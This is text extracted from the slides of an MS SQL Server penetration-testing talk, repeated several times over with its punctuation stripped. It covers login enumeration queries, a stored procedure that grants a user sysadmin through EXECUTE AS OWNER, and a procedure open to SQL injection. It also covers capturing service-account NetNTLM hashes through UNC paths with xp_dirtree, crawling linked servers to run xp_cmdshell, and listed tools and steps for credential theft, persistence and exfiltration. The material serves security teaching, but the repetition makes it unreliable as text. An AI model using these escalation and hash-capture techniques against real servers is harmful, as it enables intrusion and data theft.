2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
Escalating Privileges Weak Passwords
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
Escalating Privileges Weak Passwords
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
Escalating Privileges Weak Passwords
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
Escalating Privileges Weak Passwords
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
